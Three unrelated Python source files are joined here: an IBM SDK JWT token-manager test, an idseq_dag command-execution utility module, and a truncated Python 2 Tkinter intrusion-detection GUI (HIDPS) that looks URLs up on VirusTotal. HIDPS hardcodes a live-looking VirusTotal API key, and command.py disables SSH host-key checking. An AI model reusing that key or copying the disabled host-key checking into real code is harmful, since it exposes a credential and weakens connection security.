test_jwt_token_manager.py
# pylint: disable=missing-docstring,protected-access,abstract-class-instantiated
import time
import threading
from typing import Optional
import jwt
import pytest
from ibm_cloud_sdk_core import JWTTokenManager, DetailedResponse
class JWTTokenManagerMockImpl(JWTTokenManager):
def __init__(self, url: Optional[str] = None, access_token: Optional[str] = None) -> None:
self.url = url
self.access_token = access_token
self.request_count = 0 # just for tests to see how many times request was called
super().__init__(url, disable_ssl_verification=access_token,
token_name='access_token')
def request_token(self) -> DetailedResponse:
self.request_count += 1
current_time = int(time.time())
token_layout = {
"username": "dummy",
"role": "Admin",
"permissions": [
"administrator",
"manage_catalog"
],
"sub": "admin",
"iss": "sss",
"aud": "sss",
"uid": "sss",
"iat": current_time,
"exp": current_time + 3600
}
access_token = jwt.encode(token_layout, 'secret', algorithm='HS256',
headers={'kid': '230498151c214b788dd97f22b85410a5'})
response = {"access_token": access_token,
"token_type": "Bearer",
"expires_in": 3600,
"expiration": current_time + 3600,
"refresh_token": "jy4gl91BQ",
"from_token_manager": True
}
time.sleep(0.5)
return response
def _get_current_time() -> int:
return int(time.time())
def test_get_token():
url = "https://iam.cloud.ibm.com/identity/token"
token_manager = JWTTokenManagerMockImpl(url)
old_token = token_manager.get_token()
assert token_manager.token_info.get('expires_in') == 3600
assert token_manager._is_token_expired() is False
token_manager.token_info = {"access_token": "old_dummy",
"token_type": "Bearer",
"expires_in": 3600,
"expiration": time.time(),
"refresh_token": "jy4gl91BQ"
}
token = token_manager.get_token()
assert token == old_token
# expired token:
token_manager.expire_time = _get_current_time() - 300
token = token_manager.get_token()
assert token != "old_dummy"
assert token_manager.request_count == 2
def test_paced_get_token():
url = "https://iam.cloud.ibm.com/identity/token"
token_manager = JWTTokenManagerMockImpl(url)
threads = []
for _ in range(10):
thread = threading.Thread(target=token_manager.get_token)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
assert token_manager.request_count == 1
def test_is_token_expired():
token_manager = JWTTokenManagerMockImpl(None, access_token=None)
assert token_manager._is_token_expired() is True
token_manager.expire_time = _get_current_time() + 3600
assert token_manager._is_token_expired() is False
token_manager.expire_time = _get_current_time() - 3600
assert token_manager._is_token_expired()
def test_abstract_class_instantiation():
with pytest.raises(TypeError) as err:
JWTTokenManager(None)
assert str(err.value) == "Can't instantiate abstract class " \
"JWTTokenManager with abstract methods " \
"request_token"
def test_disable_ssl_verification():
token_manager = JWTTokenManagerMockImpl('https://iam.cloud.ibm.com/identity/token')
token_manager.set_disable_ssl_verification(True)
assert token_manager.disable_ssl_verification is True
command.py
import multiprocessing
import random
import subprocess
import sys
import os
import threading
import time
import glob as _glob
import shutil
import pathlib
from functools import wraps
from typing import Union
import pkg_resources
import idseq_dag.util.log as log
from idseq_dag.util.trace_lock import TraceLock
import idseq_dag.util.command_patterns as command_patterns
class Updater(object):
"""Base for CommandTracker."""
def __init__(self, update_period, update_function):
self.update_period = update_period
self.update_function = update_function
self.timer_thread = None
self.exited = False
self.t_start = time.time()
def relaunch(self, initial_launch=False):
if self.exited:
return
if self.timer_thread and not initial_launch:
t_elapsed = time.time() - self.t_start
self.update_function(t_elapsed)
self.timer_thread = threading.Timer(self.update_period, self.relaunch)
self.timer_thread.name = "TimerThread"
self.timer_thread.start()
def __enter__(self):
self.relaunch(initial_launch=True)
return self
def __exit__(self, *args):
self.timer_thread.cancel()
self.exited = True
class CommandTracker(Updater):
"""CommandTracker is for running external and remote commands and
monitoring their progress with log updates and timeouts.
"""
lock = TraceLock("CommandTracker", multiprocessing.RLock())
count = multiprocessing.Value('i', 0)
def __init__(self, update_period=15):
super(CommandTracker, self).__init__(
update_period, self.print_update_and_enforce_timeout)
# User can set the watchdog to a function that takes self.id and
# t_elapsed as single arg
self.proc = None # Value indicates registered subprocess.
self.timeout = None
self.t_sigterm_sent = None # First sigterm, then sigkill.
self.t_sigkill_sent = None
self.grace_period = update_period / 2.0
with CommandTracker.lock:
self.id = CommandTracker.count.value
CommandTracker.count.value += 1
def print_update_and_enforce_timeout(self, t_elapsed):
"""Log an update after every polling period to indicate the command is
still active.
"""
if self.proc is None or self.proc.poll() is None:
log.write("Command %d still running after %3.1f seconds." %
(self.id, t_elapsed))
else:
# This should be uncommon, unless there is lengthy python
# processing following the command in the same CommandTracker
# "with" block. Note: Not to be confused with post-processing
# on the data.
log.write(
"Command %d still postprocessing after %3.1f seconds." %
(self.id, t_elapsed))
self.enforce_timeout(t_elapsed)
def enforce_timeout(self, t_elapsed):
"""Check the timeout and send SIGTERM then SIGKILL to end a command's
execution.
"""
if self.timeout is None or not self.proc or \
t_elapsed <= self.timeout or self.proc.poll() is not None:
# Skip if unregistered subprocess, subprocess not yet timed out,
# or subprocess already exited.
pass
elif not self.t_sigterm_sent:
# Send SIGTERM first.
msg = "Command %d has exceeded timeout of %3.1f seconds. " \
"Sending SIGTERM." % (self.id, self.timeout)
log.write(msg)
self.t_sigterm_sent = time.time()
self.proc.terminate()
elif not self.t_sigkill_sent:
# Grace_period after SIGTERM, send SIGKILL.
if time.time() > self.t_sigterm_sent + self.grace_period:
msg = "Command %d still alive %3.1f seconds after " \
"SIGTERM. Sending SIGKILL." % (self.id, time.time() - self.t_sigterm_sent)
log.write(msg)
self.t_sigkill_sent = time.time()
self.proc.kill()
else:
msg = "Command %d still alive %3.1f seconds after " \
"SIGKILL." % (self.id, time.time() - self.t_sigkill_sent)
log.write(msg)
class ProgressFile(object):
def __init__(self, progress_file):
self.progress_file = progress_file
self.tail_subproc = None
def __enter__(self):
# TODO: Do something else here. Tail gets confused if the file
# pre-exists. Also need to rate-limit.
if self.progress_file:
self.tail_subproc = subprocess.Popen(
"touch {pf} ; tail -f {pf}".format(pf=self.progress_file),
shell=True, executable="/bin/bash")
return self
def __exit__(self, *args):
if self.tail_subproc:
# TODO: Do we need to join the tail subproc after killing it?
self.tail_subproc.kill()
def run_in_subprocess(target):
"""
Decorator that executes a function synchronously in a subprocess.
Use case:
thread 1:
compute_something(x1, y1, z1)
thread 2:
compute_something(x2, y2, z2)
thread 3:
compute_something(x3, y3, z3)
If compute_something() is CPU-intensive, the above threads won't really run
in parallel because of the Python global interpreter lock (GIL). To avoid
this problem without changing the above code, simply decorate the definition
of compute_something() like so:
@run_in_subprocess
def compute_something(x, y, z):
...
Typical subprocess limitations or caveats apply:
a. The caller can't see any value returned by the decorated function.
It should output to a file, a pipe, or a multiprocessing queue.
b. Changes made to global variables won't be seen by parent process.
c. Use multiprocessing semaphores/locks/etc, not their threading versions.
Tip: If input from the same file is needed in all invocations of the
decorated function, do the I/O before the first call, to avoid accessing
the file multiple times.
"""
@wraps(target)
def wrapper(*args, **kwargs):
with log.print_lock:
p = multiprocessing.Process(target=target, args=args, kwargs=kwargs)
p.start()
p.join()
if p.exitcode != 0:
raise RuntimeError(f"Failed {target.__qualname__} with code {p.exitcode} on {list(args)}, {kwargs}") # singleton list prints prettier than singleton tuple
return wrapper
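# Illustrative only (not part of the original module): a minimal sketch of how
# run_in_subprocess is typically applied, per the docstring above. The function
# name and the multiprocessing.Queue used to return the result are assumptions.
#
#   result_queue = multiprocessing.Queue()
#
#   @run_in_subprocess
#   def _sum_of_squares(values, out_queue):
#       # Runs in a child process, so it is not limited by the parent's GIL;
#       # results must come back via a multiprocessing-safe channel.
#       out_queue.put(sum(v * v for v in values))
#
#   _sum_of_squares(range(10), result_queue)   # blocks until the child exits
#   total = result_queue.get()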
def retry(operation, MAX_TRIES=3):
"""Retry decorator for external commands."""
# Note the use of a separate random generator for retries so transient
# errors won't perturb other random streams used in the application.
invocation = [0] # a python trick, without which the nested function would not increment a counter defined in the parent
@wraps(operation)
def wrapped_operation(*args, **kwargs):
randgen = None
remaining_attempts = MAX_TRIES
delay = 1.0
while remaining_attempts > 1:
try:
t_start = time.time()
return operation(*args, **kwargs)
except:
t_end = time.time()
if randgen == None:
invocation[0] += 1
randgen = random.Random(os.getpid() * 10000 + invocation[0]).random # seed based on pid so subprocesses won't retry in lockstep
if t_end - t_start > 30:
# For longer operations, the delay should increase, so that the backoff will meaningfully reduce load on the failing service.
delay = (t_end - t_start) * 0.2
wait_time = delay * (1.0 + 2.0 * randgen())
log.write(f"Sleeping {wait_time} seconds before retry {MAX_TRIES - remaining_attempts + 1} of {operation} with {args}, {kwargs}.")
time.sleep(wait_time)
delay *= 3.0
remaining_attempts -= 1
# The last attempt is outside try/catch so caller can handle exception
return operation(*args, **kwargs)
return wrapped_operation
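# Illustrative only (not part of the original module): the retry decorator wraps
# a flaky callable and re-invokes it with jittered backoff. The function below
# is a hypothetical example.
#
#   @retry
#   def flaky_download(url, dest):
#       execute(command_patterns.SingleCommand(cmd="wget", args=["-O", dest, url]))
#
#   # Transient failures are retried up to MAX_TRIES times (default 3); the
#   # final attempt propagates its exception to the caller.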
@retry
def execute_with_retries(command,
progress_file=None,
timeout=None,
grace_period=None,
merge_stderr=False,
log_context_mode=log.LogContextMode.START_END_LOG_EVENTS):
execute(
command=command,
progress_file=progress_file,
timeout=timeout,
grace_period=grace_period,
merge_stderr=merge_stderr,
log_context_mode=log_context_mode
)
def execute(command: Union[command_patterns.CommandPattern, str],
progress_file: str = None,
timeout: int = None,
grace_period: int = None,
capture_stdout: bool = False,
merge_stderr: bool = False,
log_context_mode: log.LogContextMode = log.LogContextMode.START_END_LOG_EVENTS) -> Union[str, None]:
"""Primary way to start external commands in subprocesses and handle
execution with logging.
"""
if not isinstance(command, command_patterns.CommandPattern):
# log warning if using legacy format
log.write(warning=True, message=f"Command parameter is using legacy type str. Use idseq_dag.util.command_patterns.", obj_data={"cmd": command, "type": type(command)})
cmd = command_patterns.ShellScriptCommand(script=command, args=[])
else:
cmd = command
with CommandTracker() as ct:
log_values = {"cid": f"Command {ct.id}", "command": cmd.as_dict()}
with log.log_context('command_execute', values=log_values, log_context_mode=log_context_mode) as lctx:
with ProgressFile(progress_file):
if timeout:
ct.timeout = timeout
if grace_period:
ct.grace_period = grace_period
if capture_stdout:
# Capture only stdout. Child stderr = parent stderr unless
# merge_stderr specified. Child input = parent stdin.
ct.proc = cmd.open(
stdin=sys.stdin.fileno(),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT if merge_stderr else sys.stderr.fileno()
)
stdout, _ = ct.proc.communicate()
else:
# Capture nothing. Child inherits parent stdin/out/err.
ct.proc = cmd.open()
ct.proc.wait()
stdout = None
lctx.values.update({"returncode": ct.proc.returncode})
if ct.proc.returncode:
raise subprocess.CalledProcessError(ct.proc.returncode,
str(command), stdout)
if capture_stdout:
return stdout
def execute_with_output(command: Union[command_patterns.CommandPattern, str],
progress_file: str = None,
timeout: int = None,
grace_period: int = None,
merge_stderr: bool = False,
log_context_mode: log.LogContextMode = log.LogContextMode.START_END_LOG_EVENTS):
return execute(
command=command,
progress_file=progress_file,
timeout=timeout,
grace_period=grace_period,
capture_stdout=True,
merge_stderr=merge_stderr,
log_context_mode=log_context_mode
).decode('utf-8')
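# Illustrative only: execute_with_output returns the command's stdout as a str.
# The command below is a hypothetical example using the SingleCommand pattern
# from idseq_dag.util.command_patterns (also used by scp()/remote() further down).
#
#   listing = execute_with_output(
#       command_patterns.SingleCommand(cmd="ls", args=["-l", "/tmp"])
#   )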
def make_dirs(path: str):
if not os.path.isdir(path):
with log.log_context(context_name="command.make_dirs", values={'path': path}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
os.makedirs(path, exist_ok=True)
def write_text_to_file(text: str, file_path: str):
with log.log_context(context_name='command.write_text_to_file', values={'path': file_path, 'text': text}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
with open(file_path, "w") as f:
print(text, file=f)
def copy_file(src: str, dst: str):
with log.log_context(context_name='command.copy_file', values={'src': src, 'dest': dst}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
shutil.copy(src, dst)
def move_file(src: str, dst: str):
with log.log_context(context_name='command.move_file', values={'src': src, 'dest': dst}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
shutil.move(src, dst)
def rename(src: str, dst: str):
with log.log_context(context_name='command.rename', values={'src': src, 'dest': dst}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
os.rename(src, dst)
def touch(path, exist_ok=True):
with log.log_context(context_name='command.touch', values={'path': path}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
pathlib.Path(path).touch(exist_ok=exist_ok)
def remove_file(file_path: str):
with log.log_context(context_name='command.remove_file', values={'path': file_path}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
os.remove(file_path)
def remove_rf(path: str):
'''Mimics behavior of rm -rf linux command.'''
def _remove_entry(path_entry):
if os.path.isdir(path_entry) and not os.path.islink(path_entry):
shutil.rmtree(path_entry)
elif os.path.exists(path_entry):
os.remove(path_entry)
with log.log_context(context_name='command.remove_rf', values={'path': path}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
path_list = _glob.glob(path)
if len(path_list) == 1 and path_list[0] == path:
_remove_entry(path)
else:
for path_entry in path_list:
with log.log_context(context_name='command.remove_rf._remove_entry', values={'path_entry': path_entry}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
_remove_entry(path_entry)
def chmod(path: str, mode: int):
'''Execute a chmod operation.
Parameter 'mode' must be in octal format. Ex: chmod('/tmp/test.txt', 0o400)'''
with log.log_context(context_name='command.chmod', values={'path': path, 'mode': oct(mode)}, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
os.chmod(path, mode)
def glob(glob_pattern: str, strip_folder_names: bool = False, max_results: int = 0):
'''
Execute a glob pattern to local file system.
Parameters:
glob_pattern(str): A glob pattern. Ex: /tmp/*.gz
max_results(int): Limit the number of results to be returned. Zero means no limit is set.
strip_folder_names(bool): Return only the file names without folder information.
Ex: "/tmp/123.txt" is returned as "123.txt"
Returns:
Array of strings containing the files found. Empty array if none is found.
'''
values = {'glob_pattern': glob_pattern, 'strip_folder_names': strip_folder_names, 'max_results': max_results}
with log.log_context(context_name='command.glob', values=values, log_context_mode=log.LogContextMode.EXEC_LOG_EVENT):
results = _glob.glob(glob_pattern)
results.sort()
if max_results > 0:
results = results[:max_results]
if strip_folder_names:
results = list(map(os.path.basename, results))
values["results"] = results
return results
def scp(key_path, remote_username, instance_ip, remote_path, local_path):
assert " " not in key_path
assert " " not in remote_path
assert " " not in local_path
# ServerAliveInterval to fix issue with containers keeping open an SSH
# connection even after worker machines had finished running.
return command_patterns.SingleCommand(
cmd="scp",
args=[
"-o", "StrictHostKeyChecking no",
"-o", "ConnectTimeout 15",
"-o", "ServerAliveInterval 60",
"-i", key_path,
f"{remote_username}@{instance_ip}:{remote_path}",
local_path
]
)
def remote(base_command, key_path, remote_username, instance_ip):
# ServerAliveInterval to fix issue with containers keeping open an SSH
# connection even after worker machines had finished running.
return command_patterns.SingleCommand(
cmd="ssh",
args=[
"-o", "StrictHostKeyChecking no",
"-o", "ConnectTimeout 15",
"-o", "ServerAliveInterval 60",
"-i", key_path,
f"{remote_username}@{instance_ip}",
base_command
]
)
def get_resource_filename(root_relative_path, package='idseq_dag'):
'''
Given a file path relative to the root of the package, it returns an absolute path.
Example:
command.get_resource_filename("scripts/fastq-fasta-line-validation.awk")
will return a string containing:
/app/idseq_dag/scripts/fastq-fasta-line-validation.awk
'''
return pkg_resources.resource_filename(package, root_relative_path)
class LongRunningCodeSection(Updater):
"""
Make sure we print something periodically while a long section of code is running.
"""
lock = TraceLock("LongRunningCodeSection", multiprocessing.RLock())
count = multiprocessing.Value('i', 0)
def __init__(self, name, update_period=15):
super(LongRunningCodeSection, self).__init__(
update_period, self.print_update)
with LongRunningCodeSection.lock:
self.id = LongRunningCodeSection.count.value
LongRunningCodeSection.count.value += 1
self.name = name
def print_update(self, t_elapsed):
"""Log an update after every polling period to indicate the code section is
still active.
"""
log.write("LongRunningCodeSection %d (%s) still running after %3.1f seconds." %
(self.id, self.name, t_elapsed))
HIDPS.pyw
import fcntl, easygui, logging, time, urllib, urllib2, sys, simplejson, ttk, multiprocessing, Queue, os, netifaces
import socket, struct  # used below for the raw AF_PACKET socket and header parsing
import iptc  # python-iptables, used by ipTables()
from Tkinter import *
from threading import *
from PIL import Image, ImageTk
from netfilter import *
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
inc_txt_str = " "
out_txt_str = " "
inc_packet = 0
inc_packet_size = 0.0
out_packet = 0
out_packet_size = 0.0
pSniff = 0
pParse = 0
pVT = 0
subdirectory = "IPDB"
subdirectory1="Icons"
wl = ['google', 'dropbox', 'facebook', 'valve', 'amazon', 'apple']
bl = ['tk', 'crack', 'xxx', 'hack', 'crack']
if not os.path.exists(os.path.join(subdirectory)):
os.makedirs(os.path.join(subdirectory))
with open(os.path.join(subdirectory, "parseip.db"), "a") as parse_ip:
parse_ip.write("")
with open(os.path.join(subdirectory, "blacklist.db"), "a") as parse_ip:
parse_ip.write("")
with open(os.path.join(subdirectory, "whitelist.db"), "a") as parse_ip:
parse_ip.write("")
with open(os.path.join(subdirectory, "greylist.db"), "a") as parse_ip:
parse_ip.write("")
def exitClick(main_win):
main_win.destroy()
main_win.quit()
sys.exit()
def optionsON():
global pauseButton,listframe,whiteButton,blackButton,greyButton
pauseButton=Button(border_buttons1,text="Pause",command=pauseSniff)
pauseButton.pack(side="left",ipadx=10,pady=7)
listframe=Frame(parse_win)
whiteButton=Button(listframe,text="Clear Whitelist", command=clearWhitelist)
whiteButton.grid(row=0, column=0, ipadx=10,pady=7)
blackButton=Button(listframe,text="Clear Blacklist", command=clearBlacklist)
blackButton.grid(row=0, column=2, ipadx=10,pady=7)
greyButton=Button(listframe,text="Clear Greylist", command=clearGreylist)
greyButton.grid(row=0, column=4,ipadx=10,pady=7)
listframe.grid(row=4, column=0, columnspan=3)
if Omenu.entrycget(0,"state")==NORMAL:
Omenu.entryconfigure(0,state=DISABLED)
if Omenu.entrycget(2,"state")==DISABLED:
Omenu.entryconfigure(2,state=NORMAL)
def clearWhitelist():
#os.remove(os.path.join(subdirectory, "whitelist.db")
with open(os.path.join(subdirectory, "whitelist.db"), "w") as parse_ip:
parse_ip.write("")
whiteltext.configure(state=NORMAL)
whiteltext.delete(1.0,END)
whiteltext.configure(state=DISABLED)
def clearBlacklist():
#os.remove(os.path.join(subdirectory, "whitelist.db")
with open(os.path.join(subdirectory, "blacklist.db"), "w") as parse_ip:
parse_ip.write("")
blackltext.configure(state=NORMAL)
blackltext.delete(1.0,END)
blackltext.configure(state=DISABLED)
def clearGreylist():
#os.remove(os.path.join(subdirectory, "whitelist.db")
with open(os.path.join(subdirectory, "greylist.db"), "w") as parse_ip:
parse_ip.write("")
greyltext.configure(state=NORMAL)
greyltext.delete(1.0,END)
greyltext.configure(state=DISABLED)
def optionsOFF():
pauseButton.pack_forget()
listframe.destroy()
if Omenu.entrycget(0,"state")==DISABLED:
Omenu.entryconfigure(0,state=NORMAL)
if Omenu.entrycget(2,"state")==NORMAL:
Omenu.entryconfigure(2,state=DISABLED)
def pauseSniff():
thrSniff.stahp()
if pauseButton["text"]=="Pause":
pauseButton["text"]="Resume"
pauseButton.configure(command=resumeSniff)
def resumeSniff():
global pSniff
pSniff = 0
if pauseButton["text"]=="Resume":
pauseButton["text"]="Pause"
pauseButton.configure(command=pauseSniff)
def hideClick():
parse_win.withdraw()
def pauseparsing():
prog.stop()
prog_stat.set(str("Status: Parsing stopped"))
image1=Image.open(os.path.join(subdirectory1,"Play.png"))
image1=image1.resize((90,90), Image.BICUBIC)
photo1=ImageTk.PhotoImage(image1)
startstopButton.configure(command=resumeparsing, image=photo1)
startstopButton.image=photo1
def resumeparsing():
prog.start(50);
prog_stat.set(str("Status: Parsing in progress"))
image1=Image.open(os.path.join(subdirectory1,"Pause.png"))
image1=image1.resize((90,90), Image.BICUBIC)
photo1=ImageTk.PhotoImage(image1)
startstopButton.configure(command=pauseparsing, image=photo1)
startstopButton.image=photo1
def ipTables():
#GUI
iptable= Toplevel()
iptable.title("System IP Table")
iptable.resizable(1,1)
iptable.withdraw()
iptable.deiconify()
iptable_frame= Frame(iptable)
iptable_frame.grid(row=3, columnspan=3)
iptable_textbox = Text(iptable_frame,width=screen_width/20,height=screen_height/30, bg="white", fg="black", state="normal")
iptable_textbox.pack(fill=BOTH, expand=YES, side="left")
table = iptc.Table(iptc.Table.FILTER)
chain = iptc.Chain(table, 'OUTPUT')
for rule in chain.rules:
(packets, bytes) = rule.get_counters()
print packets, bytes
for chain in table.chains:
print "======================="
print "Chain ", chain.name
for rule in chain.rules:
print "Rule", "proto:", rule.protocol, "src:", rule.src, "dst:", rule.dst, "in:", rule.in_interface, "out:", rule.out_interface,
print "Matches:",
for match in rule.matches:
print match.name,
print "Target:",
print rule.target.name
print "======================="
def aboutClick():
about_win = Toplevel()
about_win.title("About")
about_win.resizable(1,1)
about_win.withdraw()
about_win.deiconify()
about_frame=Frame(about_win)
about_frame.grid(row=3,columnspan=3)
about_textbox = Text(about_frame, width=screen_width/20,height=screen_height/30, bg="black", fg="green", state="normal")
about_textbox.pack(fill=BOTH, expand=YES, side="left")
about_text="\n\n\tHH HH IIIII DDDDD PPPPPP SSSSS\n\tHH HH III DD DD PP PP SS \n\tHHHHHHH III DD DD PPPPPP SSSSS \n\tHH HH III DD DD PP SS\n\tHH HH IIIII DDDDDD PP SSSSS \n\n The Heuristic Intrusion Detection and Prevention System\n\n\nA lightweight, intelligent security suite for your linux servers\nVersion: 0.1\nVisit http://www.vaptlab.com/HIDPS\n\nCreated by:\nKirit Sankar Gupta\nDiptarshi Sen\nPiyali Gupta"
about_textbox.insert(END, about_text)
about_textbox.configure(state=DISABLED)
def parseUI():
global parse_win, parseips, prog_stat, startstopButton, tpi, prog_label, prog, spi, whitel, whiteltext, whitescroll, blackl, blackltext, blackscroll, greyl, greyltext, greyscroll
parse_win = Toplevel()
parse_win.title("Parsing IPs")
parse_win.resizable(1,1)
#parse_win.overrideredirect(True)
parse_win.withdraw()
parseips = Frame(parse_win)
parse_win._offsetx = 0
parse_win._offsety = 0
parse_win.protocol('WM_DELETE_WINDOW', parse_win.withdraw)
tpi = Text(parseips, width=screen_width/12, height=screen_height/50, bg="black", fg="white")
tpi.pack(fill=BOTH, expand=YES, side="left")
parseips.grid(row=0,column=0, columnspan=3, sticky=NW)
with open(os.path.join(subdirectory, "parseip.db"), 'r') as piList:
addtoPI = piList.read()
tpi.configure(state=NORMAL)
tpi.insert(END, addtoPI)
tpi.see(END)
tpi.update_idletasks()
tpi.configure(state=DISABLED)
whitel= Frame(parse_win)
whiteltext= Text(whitel, width=screen_width/32, height=screen_height/45, bg="white", fg="black")
whiteltext.pack(fill=BOTH, expand=YES, side="left")
whitescroll = Scrollbar(whitel)
whitescroll.pack(side="right", fill="y")
whitescroll.config(command=whiteltext.yview)
whiteltext.config(yscrollcommand=whitescroll.set)
whitel.grid(row=3,column=0, sticky=W)
with open(os.path.join(subdirectory, "whitelist.db"), 'r') as wlList:
addtoWL = wlList.read()
whiteltext.configure(state=NORMAL)
whiteltext.insert(END, addtoWL)
whiteltext.see(END)
whiteltext.update_idletasks()
whiteltext.configure(state=DISABLED)
blackl= Frame(parse_win)
blackltext= Text(blackl, width=screen_width/32, height=screen_height/45, bg="black", fg="white")
blackltext.pack(fill=BOTH, expand=YES, side="left")
blackscroll = Scrollbar(blackl)
blackscroll.pack(side="right", fill="y")
blackscroll.config(command=blackltext.yview)
blackltext.config(yscrollcommand=blackscroll.set)
blackl.grid(row=3,column=1, sticky=E)
with open(os.path.join(subdirectory, "blacklist.db"), 'r') as blList:
addtoBL = blList.read()
blackltext.configure(state=NORMAL)
blackltext.insert(END, addtoBL)
blackltext.see(END)
blackltext.update_idletasks()
blackltext.configure(state=DISABLED)
greyl= Frame(parse_win)
greyltext= Text(greyl, width=screen_width/32, height=screen_height/45, bg="grey", fg="red")
greyltext.pack(fill=BOTH, expand=YES, side="left")
greyscroll = Scrollbar(greyl)
greyscroll.pack(side="right", fill="y")
greyscroll.config(command=greyltext.yview)
greyltext.config(yscrollcommand=greyscroll.set)
greyl.grid(row=3,column=2, sticky=E)
with open(os.path.join(subdirectory, "greylist.db"), 'r') as glList:
addtoGL = glList.read()
greyltext.configure(state=NORMAL)
greyltext.insert(END, addtoGL)
greyltext.see(END)
greyltext.update_idletasks()
greyltext.configure(state=DISABLED)
#buttonsGUI
image1=Image.open(os.path.join(subdirectory1,"Play.png"))
image1=image1.resize((90,90), Image.BICUBIC)
photo1=ImageTk.PhotoImage(image1)
button_frame = Frame(parseips)
startstopButton = Button(button_frame, compound=TOP, width=90,height=90, image=photo1, command=resumeparsing)
startstopButton.image=photo1
startstopButton.grid(row=2,column=3)
image2=Image.open(os.path.join(subdirectory1,"Hide.png"))
image2=image2.resize((90,90), Image.BICUBIC)
photo2= ImageTk.PhotoImage(image2)
hidebutton = Button(button_frame,command=hideClick,compound=TOP,width=90, height=90, image=photo2)
hidebutton.image=photo2
hidebutton.grid(row=4,column=3)
button_frame.pack(side="right")
spi = Scrollbar(parseips)
spi.pack(side="right", fill="y")
spi.config(command=tpi.yview)
tpi.config(yscrollcommand=spi.set)
s=ttk.Style()
s.theme_use('clam')
s.configure("red.Horizontal.TProgressbar", foreground='red', background='red')
prog= ttk.Progressbar(parse_win, style="red.Horizontal.TProgressbar", mode='indeterminate', orient='horizontal', length=500, maximum=50)
prog_stat = StringVar()
#prog_stat = "Parsing stopped"
prog_label = Label(parse_win, borderwidth=2,height=1,width=60, font='verdana 10', textvariable=prog_stat);
prog_label.grid(row=2,column=0, columnspan=3)
prog.grid(row=1, column=0, columnspan=3)
def parseClick ():
global thrVT
parse_win.deiconify()
thrVT = Thread(target=vtLookup, args=("http://executivecoaching.co.il",))
thrVT.start()
def vtLookup (testIP):
url = "https://www.virustotal.com/vtapi/v2/url/scan"
#testIP = "http://executivecoaching.co.il"
parameters = {"url": testIP, "apikey": "95c948ffe8c50d27b0087b71c04c1b0ccf074007fe7fa0bc48bf4094063d7088"}
data = urllib.urlencode(parameters)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
json = response.read()
response_dict = simplejson.loads(json)
scan_id = response_dict['scan_id']
scan_id=str(scan_id)
scanID, dateID = scan_id.split('-')
url = "https://www.virustotal.com/vtapi/v2/url/report"
parameters = {"resource": scanID, "apikey": "95c948ffe8c50d27b0087b71c04c1b0ccf074007fe7fa0bc48bf4094063d7088"}
data = urllib.urlencode(parameters)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
json = response.read()
response_dict = simplejson.loads(json)
positives = response_dict['positives']
total = response_dict['total']
rating = float(positives)/total
rating = rating*20
print "Danger rating of " + str(testIP) + " is: " + str(rating) + "\n"
if rating < 1:
text_file = open(os.path.join(subdirectory, "whitelist.db"), 'a')
text_file.write(str(testIP))
text_file.write("\n")
text_file.close()
elif rating < 5:
text_file = open(os.path.join(subdirectory, "greylist.db"), 'a')
text_file.write(str(testIP))
text_file.write("\n")
text_file.close()
else:
text_file = open(os.path.join(subdirectory, "blacklist.db"), 'a')
text_file.write(str(testIP))
text_file.write("\n")
text_file.close()
def mainUI():
global main_win, border_in, t, border_out, t1, border_misc, t2, border_buttons, border_buttons1, border_buttons2, countinPackets, countoutPackets, inpCount, outpCount, aboutbutton, quitButton, viewip, parseButton, screen_height, screen_width,pauseButton,Omenu
main_win = Tk()
mwTitle="The Heuristic IDPS: Now listening on Interface "
mwTitle=mwTitle+str(interface)
main_win.title(mwTitle)
main_win.resizable(1, 1)
#main_win.overrideredirect(True)
main_win.withdraw()
screen_width = main_win.winfo_screenwidth()
screen_height = main_win.winfo_screenheight()
menu=Menu(main_win)
main_win.config(menu=menu)
fileMenu=Menu(menu,tearoff=False,bd=3,relief=RAISED)
subMenu=Menu(fileMenu,tearoff=False,bd=3,relief=RAISED)
subMenu.add_command(label="Select Interface",command=lambda:thrSniff.chInterface(),activeforeground="green")
fileMenu.add_cascade(label="Preferences",menu=subMenu,activeforeground="green")
fileMenu.add_separator()
fileMenu.add_command(label="Exit",command=lambda:exitClick(main_win),activeforeground="green")
menu.add_cascade(label="File",menu=fileMenu,activeforeground="green",state=NORMAL)
optionMenu=Menu(menu,tearoff=False,bd=3,relief=RAISED)
Omenu=Menu(optionMenu,tearoff=False,bd=3,relief=RAISED)
Omenu.add_command(label="ON",command=optionsON,activeforeground="green")
Omenu.entryconfigure(1,state=NORMAL)
Omenu.add_command(label="OFF",command=optionsOFF,activeforeground="green")
Omenu.entryconfigure(2,state=DISABLED)
menu.add_cascade(label="Options",menu=optionMenu,activeforeground="green",state=NORMAL)
optionMenu.add_cascade(label="Advanced Options",menu=Omenu,activeforeground="green",state=NORMAL)
helpMenu=Menu(menu,tearoff=False,bd=3,relief=RAISED)
menu.add_cascade(label="Help",menu=helpMenu,activeforeground="green")
helpMenu.add_command(label="About",command=aboutClick,activeforeground="green")
border_in = Frame(main_win)
t = Text(border_in, width=screen_width/30,height=screen_height/20,bg="black", fg="red")
t.pack(fill=BOTH, expand=YES, side="left")
s = Scrollbar(border_in)
s.pack(side="right", fill="y")
s.config(command=t.yview)
t.config(yscrollcommand=s.set)
border_in.grid(row=0,column=0,columnspan=1 ,sticky=W)
border_out = Frame(main_win)
t1 = Text(border_out, width=screen_width/30,height=screen_height/20,bg="black", fg="green")
t1.pack(side="left", fill="both", expand=YES)
s1 = Scrollbar(border_out)
s1.pack(side="right", fill="y")
s1.config(command=t1.yview)
t1.config(yscrollcommand=s1.set)
border_out.grid(row=0,column=1,columnspan=1 ,sticky=W)
border_misc = Frame(main_win)
t2 = Text(border_misc, width=screen_width/20,height=screen_height/20, bg="black", fg="white")
t2.pack(side="left", fill="both", expand=YES)
s2 = Scrollbar(border_misc)
t2.config(yscrollcommand=s2.set)
s2.pack(side="right", fill="y")
